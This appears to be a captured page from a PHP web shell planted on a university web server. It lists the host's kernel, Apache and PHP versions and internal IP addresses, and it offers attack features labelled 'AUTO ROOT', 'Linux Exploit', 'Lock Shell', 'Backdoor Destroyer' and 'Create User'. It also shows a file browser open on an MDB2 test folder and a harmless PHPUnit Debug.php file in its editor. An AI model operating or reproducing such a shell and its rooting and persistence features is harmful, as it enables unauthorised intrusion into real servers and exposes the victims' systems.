Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
MDB2 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
Nonstandard
[ DIR ]
drwxr-xr-x
Standard
[ DIR ]
drwxr-xr-x
AllTests.php
1.4
KB
-rw-r--r--
autoload.inc
2.09
KB
-rw-r--r--
Debug.php
1.65
KB
-rw-r--r--
dsn.inc
9.32
KB
-rw-r--r--
functions.inc
3.69
KB
-rw-r--r--
import.schema.php
503
B
-rw-r--r--
README
747
B
-rw-r--r--
schema.xml
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Debug.php
<?php /** * A place to point debuggers for running specific tests * * To change the test called, edit addTestSuite()'s parameter. * * You may need to add your <DBMS>_TEST_* environment variables here. * See the example in the code, below. * * @package MDB2 * @category Database * @author Daniel Convissor <danielc@php.net> */ /* $_ENV['MYSQL_TEST_USER']='test'; $_ENV['MYSQL_TEST_PASSWD']='test'; $_ENV['MYSQL_TEST_DB']='test'; $_ENV['MYSQL_TEST_SOCKET']='/var/run/mysqld/mysqld.sock'; */ // Setting this here because this isn't the general test suite. error_reporting(E_ALL & ~E_STRICT & ~E_DEPRECATED); // Keep tests from running twice when calling this file directly via PHPUnit. $call_main = false; if (strpos($_SERVER['argv'][0], 'phpunit') === false) { // Called via php, not PHPUnit. Pass the request to PHPUnit. if (!defined('PHPUnit_MAIN_METHOD')) { /** An indicator of which test was called. */ define('PHPUnit_MAIN_METHOD', 'Debug::main'); $call_main = true; } } /** * Establish the test suite's environment. */ require_once __DIR__ . '/autoload.inc'; /** * A place to point debuggers for running specific tests * * To change the test called, edit addTestSuite()'s parameter. * * @package MDB2 * @category Database * @author Daniel Convissor <danielc@php.net> */ class Debug { public static function main() { PHPUnit_TextUI_TestRunner::run(self::suite()); } public static function suite() { $suite = new PHPUnit_Framework_TestSuite('MDB2 Test Debugging'); $suite->addTestSuite('Standard_DatatypeTest'); return $suite; } } if ($call_main) { Debug::main(); }
Close